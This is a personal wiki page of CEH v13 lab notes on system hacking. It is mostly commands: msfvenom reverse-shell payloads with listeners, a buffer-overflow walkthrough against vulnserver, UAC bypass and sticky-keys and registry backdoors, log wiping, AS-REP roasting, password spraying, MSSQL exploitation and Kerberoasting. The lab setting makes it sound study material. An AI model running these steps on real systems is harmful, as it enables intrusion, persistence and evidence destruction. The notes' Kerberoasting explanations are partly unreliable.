🕹️
Ghoulsec Vault
Website Toolbase
  • Welcome !
  • 🗃️Exam Prep Notes
    • 📔CEH V13 (Master Edition)
      • Module 02: Footprinting and Reconnaissance
      • Module 03: Scanning Networks
      • Module 04: Enumeration
      • Module 05: Vulnerability Analysis
      • Module 06: System Hacking
      • Module 07: Malware Threats
      • Module 08: Sniffing
      • Module 09 : Social Engineering
      • Module 10: Denial of Service
      • Module 11: Session Hijacking
      • Module 12: Evading IDS, Firewalls , Honeypots
      • Module 13: Hacking web servers
      • Module 14: Hacking Web Applications
      • Module 15:SQL Injection
      • Module 16: Wireless Attacks
      • Module 17: Hacking Mobile Platforms
      • Module 18: IoT & OT Hacking
      • Module 19 : Cloud Computing
      • Module 20 : Cryptography
    • 📘ISC2 -Certified in Cyber Security
      • Chapter -1 Security Principals
      • Chapter -2 Disaster Recovery,Business Continuity & Incident Response
      • Chapter -3 Access Control Concepts
      • Chapter -4 Network Security
      • Chapter -5 Security Operations
    • 📗AZ - 900
      • Basics of Cloud Computing
        • Economic of Scale
        • CapEx & OpEx
        • Consumption based model
        • Cloud Deployment Models
        • Shared Responsibility Model
        • Data centers, Regions & Availability Zones & Geographyies in Azure
        • Resources & Resource Group
        • Azure Access Tools
        • Azure Service Lifecycle
        • Azure SLAs
        • Azure Cloud Adoption Framework
      • Azure Services
        • Azure Computing Services
        • Azure Networking Services
        • Azure Storage Services
        • Azure Database Service
        • Azure Marketplace
        • Big Data & Azure
        • Azure Serverless Computing
        • IoT & Azure
        • Other Azure Services
        • Azure Resource Locks & Resource Tags
        • Azure Security Services
          • Security Groups
          • Routing Tables
          • Azure Firewall
          • Azure DDOS Protection
          • Azure Identity & Access Management (Azure AD)
          • Azure RBAC
          • Azure Security Center
          • Azure Key Vault
      • Azure policies & Blueprints
      • Azure Cost Management
      • Azure Core Tenents
    • 📗SC - 900
      • Zero Trust Model
      • Shared Responsibility Model
      • Defense in Depth
      • Security Controls
      • CIA Triad
      • Encryption / Hashing / Signing
      • Microsoft Security & Compliance Principals
      • Common Identity Attacks
      • Microsoft Identity as Primary Security Perimeter
      • Modern Authentication with Azure AD
      • Azure AD Identity Types
      • Azure External Identities
      • Hybrid Identities
      • Authentication Methods & Password Protection
      • Conditional Access
      • Azure AD Roles & RBAC
      • Governance in Azure AD
      • Azure Identity Protection
      • Azure NSG, DDOS, Firewall
      • Azure Bastion & Keyvault
      • Azure Encryption
      • Azure CSPM
      • Azure Security Center
      • Azure Defender
        • Microsoft O365 Defender
        • Azure Sentinel
      • Microsoft Cloud App Security
      • Microsoft Intune
      • Microsoft Complaince Manager
      • Information Protection
      • Microsoft insider risk capabilities
    • 📔AWS Cloud Practitioner
      • Cloud Deployment
        • AWS Global Infrastructure
      • AWS Cloud Essentials
        • AWS SNS
          • AWS SQS
      • AWS Compute & Container Services
        • AWS EC2
          • Elasticity & Agility
        • AWS Serverless Computing
        • AWS Container Services
        • AWS Beanstalk
        • AWS Load Balancing
      • AWS Storage & Databases
      • AWS Networking
      • AWS Security
        • AWS Organisation
        • AWS Compliance
        • AWS DDOS
        • Additional Security Services
      • AWS Monitoring & Analytics
        • Other Analytics Services
      • AWS Pricing & Support
      • AWS Migration & Innovation
        • Migration Statergies
        • AWS Snow Family
        • AWS Transfer Family
        • Innovation on AWS
      • AWS Well Architecture Framework
      • Other AWS Services
  • 🧑‍💻Cyber Security Base
    • Ghoul's Den
    • Cheatsheets
    • SSL Handbook
      • Installing OpenSSL
      • Encrypting Web Servers using SSL
      • Compiling .pfx file using openssl
      • De-compiling .pfx file
      • Zimbra Mail Server SSL renew
      • SSL Certificates
    • ☁️Cloud Security
      • Amazon Web Services (AWS)
        • AWS - IAM & Policy Management
        • AWS Organization
        • AWS - Roles (Assume Role)
        • AWS - EC2 (Elastic Computing)
        • AWS - VPC
        • AWS - Bastion Host
        • AWS Application Load Balancer
        • AWS Auto Scaling Group
        • AWS WAF
        • AWS - VPC Peering
        • AWS Transit Gateway
        • AWS NAT Gateway
        • AWS - Route 53
        • AWS Certificates Manager
        • AWS Network Load Balancer (NLB)
    • 🕸️Network Security
      • Firewalls
        • Sophos - Security Suite
          • Sophos Firewalls
      • VPN
        • VPNs
          • Wireguard Tunneling
          • StrongSwan Gateway VPN Server on Ubuntu
      • IP Address and IP Subnetting
      • Basic to Advance Networking Materials
    • 🧑‍💻VAPT
      • Sample Report Templete
      • OWASP
        • OWASP Web Application Security & WebGoat
      • Web Application testing checklist
        • Client Side Penetration Testing
          • Clickjacking
          • Websockets
          • CSRF
          • XSS Filters
        • Server Side Penetration Testing
        • Advanced Web Application Pentesting
          • OAuth
          • JWT Injection
          • Server Side Templete Injection
    • ☄️GRC
      • ISMS AUDIT PLAN
      • CIS Compliance Windows
    • 🔍Forensic
      • Forensic Tools
      • EMAIL Forensics
      • File header forensics
    • Trend Micro
      • Deep Security
        • Installation & Prerequisite
          • Microsoft SQL server 2022
          • Postgres 16 Core
          • Installation
    • Practical Malware Analysis & API Threats
  • 🕹️Server are fun !
    • Securing Linux
      • Securing SSH
      • Sudoers
      • UFW (Uncomplicated FW)
      • Unattended Upgrades
      • Password Complexiety
      • Auditing Linux
      • Samba - SMB
      • NFS - Network File System
      • FTP
      • AIDE
    • Servers
      • Linux Sever
        • OpenLDAP Server Setup
          • ldap-account-manager
          • Securing OpenLDAP
          • OpenLDAP client setup
          • Checking LDAP setup
        • Users & Groups
        • Password Policy
        • File & File Permissions
        • Automatic Updates
        • Adding GUI to Ubuntu Server
        • DNS Server
        • NTP Server
      • Windows Sever
        • Deep dive into Windows Server
        • Windows server Installation
        • Disable IPv6
        • Disable Server Manager on startup
        • Promoting OS to AD server
        • AD DNS
        • AD DHCP
        • AD Activation
        • AD Users & Groups
        • AD FileServer
        • Adding Users into AD
        • Bulk Importing users into Domain
        • Windows AD Resources
        • Group Policy Editor
          • Creating First Policy
          • Restricting CMD & Powershell
          • Password Policies
          • Audit Policies
          • Log Retention Policy
          • Windows Defender Firewall
          • Patch Management & Window Updates
        • Setting Up local accounts for windows hosts
    • Hacking Systems
      • Linux Systems
        • Battery Charge Threshold (Linux)
        • Metasploitable OS Complete Solved
      • Tricking Windows
        • Bitlocker & Time based policy bypass
    • Monitoring HeartBeats
    • RAID Technology
    • Managing Partitions
      • Parted
      • Fdisk
      • LVM
        • Re-claiming unused disk space
        • Adding physical volume into VG
        • Removing physical volume from VG
      • SWAP Memory
    • Virtualization
      • Proxmox
        • Proxmox VE Installation
        • Default Storage Expansion
        • Proxmox Network Link Aggegration
        • NAT Interface Configuration
        • Importing disk into proxmox
        • Creating an LVM Thin Pool
        • Proxmox IAM
  • 🙍‍♂️Dan the AI Expert
    • Ollama Ollama ...
      • Ollama
        • Ollama models
        • Open Web UI & Ollama Integration
    • Microsoft Presentation using AI
  • 🛡️Security Operations
    • Wazuh - Open Source XDR. Open Source SIEM.
      • Components
      • Deployment Methods
      • Installation
        • Single Node Installation
          • Wazuh Indexer Installation
          • Wazuh Server Installation
          • Wazuh Dashboard Installation
          • Single node deployment with Script
        • Managing multiple Wazuh clusters with Cross-Cluster Search
          • Cluster Configuration
          • Set up Cross-Cluster Search
        • Upgrading Wazuh Central Components
        • Uninstalling Wazuh
      • Custom Decoder & Rules
        • Pfsense Decoders
        • Pfsense Rules
      • Security Operations Center Tools (Wazuh)
    • IRIS-DFIR / Case Management
    • Graylog & ElasticSearch
    • Zabbix NMS
      • Zabbix Installation
      • Zabbix Database Management
        • Zabbix Database backup
        • Zabbix Database restore
        • MySQL Replication (M-M)
        • MySQL Replication (M-W)
      • Zabbix Geomap Setup
      • Adding Hosts into Zabbix
      • Zabbix Hostgroups
      • Auto Registration Hosts Zabbix
      • Zabbix Globalscrips
      • Zabbix HA Cluster
      • Zabbix Proxy
      • Zabbix Notifications
      • Zabbix Maintainance
      • Zabbix User Management & Authentication
      • Zabbix Housekeeping
      • Scheduled Reporting
      • Service Monitoring using Zabbix
  • Git the master!!
    • Configuring git
    • Git Branches
    • Undoing changes
    • Git - Cheat sheet
    • My first git...
Powered by GitBook
On this page
  • Lab 1: Gain Access to the System
  • Task 1: Perform Active Online Attack to Crack the System’s Password using Responder
  • Task 2: Gain Access to a Remote System using Reverse Shell Generator
  • Task 3: Perform Buffer Overflow Attack to Gain Access to a Remote System
  • Lab 2: Perform Privilege Escalation to Gain Higher Privileges
  • Task 1: Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys
  • Lab 3: Maintain Remote Access and Hide Malicious Activities
  • Task 1: User System Monitoring and Surveillance using Spyrix
  • Task 2: Maintain Persistence by Modifying Registry Run Keys
  • Lab 4: Clear Logs to Hide the Evidence of Compromise
  • Task 1: Clear Windows Machine Logs using Various Utilities
  • Task 2: Clear Linux Machine Logs using the BASH Shell
  • Lab 5: Perform Active Directory (AD) Attacks Using Various Tools
  • Task 1: Perform Initial Scans to Obtain Domain Controller IP and Domain Name
  • Task 2: Perform AS-REP Roasting Attack
  • Task 3: Spray Cracked Password into Network using CrackMapExec.
  • Task 4: Perform Post-Enumeration using PowerView
  • Task 5: Perform Attack on MSSQL service
  • Task 6: Perform Privilege Escalation
  • Task 7: Perform Kerberoasting Attack
  1. Exam Prep Notes
  2. CEH V13 (Master Edition)

Module 06: System Hacking

Lab 1: Gain Access to the System

Task 1: Perform Active Online Attack to Crack the System’s Password using Responder

### Step -1 : Using Responder on ParrotOS
    sudo responder -I eth0
        Capturing the hash via logging into : 
            run (Win+R) --> //CEH-Tools

## Step  -2 : Cracking hash using JohntheRipper
    john <input_file.txt>
    

Task 2: Gain Access to a Remote System using Reverse Shell Generator

Step -1 :  Reverse shell generator 
    1.1 : Running reverse shell generator on docker : 
        docker run -d -p 80:80 reverse_shell_generator
    1.2 : Reverse shell generator on web : 
        https://www.revshells.com

Step -2 : Modules used for cracking : 
    1. Msfvenom
    2. HoaxShell

Task 3: Perform Buffer Overflow Attack to Gain Access to a Remote System

1. Setting Up the Vulnerable Server

  • Objective: Launch the vulnserver application on a Windows 11 machine to simulate a vulnerable service for testing buffer overflow attacks.

  • Steps:

    • Restart the machine and log in as the admin user.

    • Navigate to the vulnserver.exe file and run it as an administrator.

    • Configure Windows Security settings to allow access, ensuring the server runs without firewall interference.

Explanation: vulnserver is a deliberately vulnerable program used to practice exploitation techniques, like buffer overflow, in a controlled environment. Running it as an administrator and allowing network access ensures it functions correctly.


2. Installing and Setting Up Immunity Debugger

  • Objective: Use Immunity Debugger to monitor and analyze the behavior of the vulnerable application.

  • Steps:

    • Install Immunity Debugger and Python (required for running debugger scripts).

    • Launch Immunity Debugger and attach it to the vulnserver process.

    • Change the debugger status to "Running."

Explanation: Immunity Debugger allows you to observe application memory, register states, and interactions with system resources. Attaching it to vulnserver facilitates the identification of vulnerabilities like buffer overflows.


3. Establishing a Connection with Netcat

  • Objective: Test the vulnserver functionality using Netcat from the Parrot Security machine.

  • Steps:

    • Connect to the vulnserver using the nc -nv <IP> 9999 command.

    • Test commands like HELP and EXIT to verify server responses.

Explanation: Netcat is a versatile tool for network diagnostics and testing. In this context, it’s used to verify that the vulnerable server is accessible and responds to commands.

Commands used : 
nc -nv 10.10.1.11 9999

4. Performing Spiking

  • Objective: Identify vulnerable functions in the server by sending malformed inputs.

  • Steps:

    • Create spike scripts for specific functions (STATS and TRUN).

    • Use the generic_send_tcp tool to send these scripts to the server and observe responses in Immunity Debugger.

Explanation: Spiking involves crafting specific inputs to test server functions for buffer overflow vulnerabilities. The debugger's status change to "Paused" indicates a possible vulnerability.

Files to be made to check Spikes : 
1. Using Spikes [STATS]
    s_readline();
    s_string(“STATS ”);
    s_string_variable(“0”);
2. Using Spikes [TRUN]
    s_readline();
    s_string(“TRUN”);
    s_string_variable(“0”);
    
## Commands to be used :
1. generic_send_tcp stats.spk 0 0
2. generic_send_tcp trun.spk 0 0

5. Conducting Fuzzing

  • Objective: Send a large volume of data to identify the exact buffer size that causes an overflow.

  • Steps:

    • Use Python scripts to send incrementally larger payloads to the vulnerable function.

    • Note the size of the payload when the server crashes.

Explanation: Fuzzing determines the threshold at which a buffer overflow occurs, helping pinpoint the exploit size. The overflow size is critical for crafting an exploit.

## Commands used : 
sudo chmod +x fuzz.py
./fuzz.py

6. Generating and Identifying Offsets

  • Objective: Determine the exact location of the overflow within the memory (EIP register).

  • Steps:

    • Use pattern_create.rb to generate a unique payload.

    • Overwrite the server with the pattern and use pattern_offset.rb to calculate the EIP offset.

Explanation: The EIP register controls execution flow. Identifying its offset ensures you can control execution by overwriting the register with malicious shellcode.

## Commands used :
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <nearest offset value eg: 10400>

### Replace the generated offsets into the file findoff.py
    sudo chmod +x findoff.py
    ./findoff.py
    
Note down the random bytes in the EIP and find the offset of those bytes.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 10400 -q 386F4337

## Checking wheather we can override the function to exec commands
sudo chmod +x overwrite.py
./overwrite.py

7. Locating Bad Characters

  • Objective: Identify characters that could disrupt the exploit payload.

  • Steps:

    • Send all possible byte values to the server and analyze memory dumps for discrepancies.

Explanation: Bad characters, like null bytes (\x00), can terminate strings prematurely, corrupting payloads. Removing these ensures a reliable exploit.

## Commands used : 
sudo chmod +x badchars.py
./badchars.py

# Read the ESP values offset generated and select "Follow in Dump" by right clicking on the offset

8. Identifying Vulnerable Modules

  • Objective: Find server modules lacking security protections, such as ASLR or DEP.

  • Steps:

    • Use mona.py in Immunity Debugger to list modules and their memory protections.

    • Identify a module (e.g., essfunc.dll) without protections.

Explanation: Exploiting a module without memory protections simplifies the attack, as it ensures predictable memory addresses.

### Commands used :
!mona modules
## Run the below code after executing converter.py section 9
!mona find -s “\xff\xe4” -m essfunc.dll

9. Finding a JMP ESP Address

  • Objective: Locate an instruction (JMP ESP) to redirect execution to the payload.

  • Steps:

    • Use mona.py to find a usable JMP ESP instruction in the identified module.

    • Convert the address to hexadecimal for use in the exploit.

Explanation: A JMP ESP instruction is crucial for redirecting execution to the payload stored on the stack.

## Commands used : 
python3 converter.py
The Enter the assembly code here : prompt appears; type JMP ESP and press Enter.
The result appears, displaying the hex code of JMP ESP (here, ffe4).

10. Crafting and Running the Exploit

  • Objective: Inject malicious shellcode to achieve control of the target machine.

  • Steps:

    • Write a Python script that includes the calculated offset, JMP ESP address, and malicious shellcode.

    • Send the crafted payload to the server and verify execution control via Immunity Debugger.

Explanation: By overwriting the EIP and injecting shellcode, you gain control over the vulnerable application, demonstrating the exploitation of the buffer overflow vulnerability.

## Commands used : 
msfvenom -p windows/shell_reverse_tcp LHOST=[Local IP Address] LPORT=[Listening Port] EXITFUNC=thread -f c -a x86 -b “\x00”
Copy the shell code generated & edit the shell_code.py file
type b in the begining of every line to convert strings to bytes 

## Starting listening service
nc -nvlp 4444

## Executing Payload
sudo chmod +x shellc_ode.py
./shell_code.py

Lab 2: Perform Privilege Escalation to Gain Higher Privileges

Task 1: Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys

## Payload Crafting using msfvenom: 
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Windows.exe
Share the payload into the vulnerable machine

## MSF Console
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST & LPORT
exploit

As the result 1 meterpreter shell will be opened and now we will excelate the priviledges using bypassing UAC

## Backgrounding sessions: 
background
## using BypassUAC by fodhelper
use exploit/windows/local/bypassuac_fodhelper
    set sessions 1
    set TARGET 0
    set LHOST & LPORT
    exploit
## once session is upgraded we will pass the UAC
    getsystem -t 1
    background

## Now we will use stickykeys to open root shell 
use post/windows/manage/sticky_keys
set session 2
expolit

## Now on the login screen of windows try clicking shift to 5 times and shell will be opened

Lab 3: Maintain Remote Access and Hide Malicious Activities

Task 1: User System Monitoring and Surveillance using Spyrix

Use the temp mail to signup
use to same mailid to for agents and server for config

Task 2: Maintain Persistence by Modifying Registry Run Keys

Registry keys labeled as Run and RunOnce are crafted to automatically run programs upon each user login to the system. The command line specified as a key's data value is restricted to 260 characters or fewer. If attackers discover a service connected to a registry key with full permissions, they can execute persistence attacks or exploit privilege escalation. Upon any authorized user's login attempt, the associated service link within the registry triggers automatically.

Commands used : 
1. Initial Access file : 
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Test.exe

2. Persistent access file : 
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=4444 -f exe > /home/attacker/Desktop/registry.exe

## msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST & LPORT
background

use exploit/windows/local/bypassuac_silentcleanup
set TARGET 0
SET LHOST & LPORT
getsystem -t 1 

## Modifying the registry
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"

Lab 4: Clear Logs to Hide the Evidence of Compromise

Task 1: Clear Windows Machine Logs using Various Utilities

Softwares used : 
Clear_Event_Viewer_Logs.bat, wevtutil, and Cipher

## wevtutil Usage : 
wevtutil el
wevtutil el <log_name>
wevtutil cl
wevtutil cl <logname>

## Cipher Usage : 
cipher /w: <Disk or Folder or File>

Task 2: Clear Linux Machine Logs using the BASH Shell

## Commands used : 
export HISTSIZE=0 # It disables the logging
history -c # it cleares the history
history -w # it cleares the history of current shell
shred ~/.bash_history # shreads the file 

Lab 5: Perform Active Directory (AD) Attacks Using Various Tools

Task 1: Perform Initial Scans to Obtain Domain Controller IP and Domain Name

## Commands used : 
nmap -T4 -A -v <IP>

Task 2: Perform AS-REP Roasting Attack

## Commands used : 
cd /impacket/examples
python3 GetNPUsers.py CEH.com/ -no-pass -usersfile /root/ADtools/users.txt -dc-ip 10.10.1.22
## Cracking the hashes
john --wordlist=/root/ADtools/rockyou.txt joshuahash.txt

Task 3: Spray Cracked Password into Network using CrackMapExec.

## Commands used : 
cme rdp 10.10.1.0/24 -u /root/ADtools/users.txt -p “cupcake” 

Task 4: Perform Post-Enumeration using PowerView

## Commands used : 
powershell -EP Bypass
 . .\PowerView.ps1 to run the script
  • Get-NetComputer command in PowerShell. This command will display all the information related to computers in AD.

  • Get-NetGroup in PowerShell. The Get-NetGroup command in PowerView lists all groups in AD, which helps in identifying group memberships and potential targets for privilege escalation.

  • Get-NetUser in PowerShell. Get-NetUser in PowerView retrieves detailed information about AD user accounts, such as usernames and group memberships.

  • Get-NetOU - Lists all organizational units (OUs) in the domain.

  • Get-NetSession - Lists active sessions on the domain.

  • Get-NetLoggedon - Lists users currently logged on to machines.

  • Get-NetProcess - Lists processes running on domain machines.

  • Get-NetService - Lists services on domain machines.

  • Get-NetDomainTrust - Lists domain trust relationships.

  • Get-ObjectACL - Retrieves ACLs for a specified object.

  • Find-InterestingDomainAcl - Finds interesting ACLs in the domain.

  • Get-NetSPN - Lists service principal names (SPNs) in the domain.

  • Invoke-ShareFinder - Finds shared folders in the domain.

  • Invoke-UserHunter - Finds where domain admins are logged in.

  • Invoke-CheckLocalAdminAccess - Checks if the current user has local admin access on specified machines.

Task 5: Perform Attack on MSSQL service

Save the username SQL_srv in a text file and name it as user.txt using command pluma user.txt.

echo "SQL_srv" >> user.txt

Now we wil use hydra to execute password spray on the user and get the password of the user SQL_srv

hydra -L user.txt -P /root/ADtools/rockyou.txt 10.10.1.30 mssql

Now using the script to get the database

python3 /root/impacket/examples/mssqlclient.py CEH.com/SQL_srv:batman@10.10.1.30 -port 1433
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name='xp_cmdshell';

Now, as we know that xp_cmdshell is enabled on SQL server we can use Metasploit to exploit this service. Type exit and press Enter; then execute the command msfconsole to launch Metasploit.

Msfconsole
    use exploit/windows/mssql/mssql_payload
    set RHOST 10.10.1.30
    set USERNAME SQL_srv
    set PASSWORD batman
    set DATABASE master
    exploit

Task 6: Perform Privilege Escalation

## Scripts used : 
./winpeas.exe

Task 7: Perform Kerberoasting Attack

Rubeus is a tool for exploiting Kerberos weaknesses in Windows environments. Kerberoasting is a method to extract ticket granting ticket (TGT) hashes from AD. Attackers target service accounts with associated Kerberos service principal names (SPNs). TGTs are requested from the DC for these accounts, then cracked offline to reveal user passwords. Kerberoasting exploits weak service account passwords and the nature of Kerberos authentication.

rubeus.exe kerberoast /outfile:hash.txt
hashcat -m 13100 --force -a 0 hash.txt /root/ADtools/rockyou.txt
  • -m 13100: This specifies the hash type. 13100 corresponds to Kerberos 5 AS-REQ Pre-Auth etype 23 (RC4-HMAC), a specific format for Kerberos hashes.

  • --force: This option forces Hashcat to ignore warnings and run even if there are compatibility issues. Use this with caution, as it might cause instability or incorrect results.

  • -a 0: This specifies the attack mode. 0 stands for a straight attack, which is a simple dictionary attack where Hashcat tries each password in the dictionary as it is.

  • hash.txt: is the input file containing the hashes to crack

  • /root/ADtools/rockyou.txt: is the wordlist file used for the attack

PreviousModule 05: Vulnerability AnalysisNextModule 07: Malware Threats

Last updated 5 months ago

🗃️
📔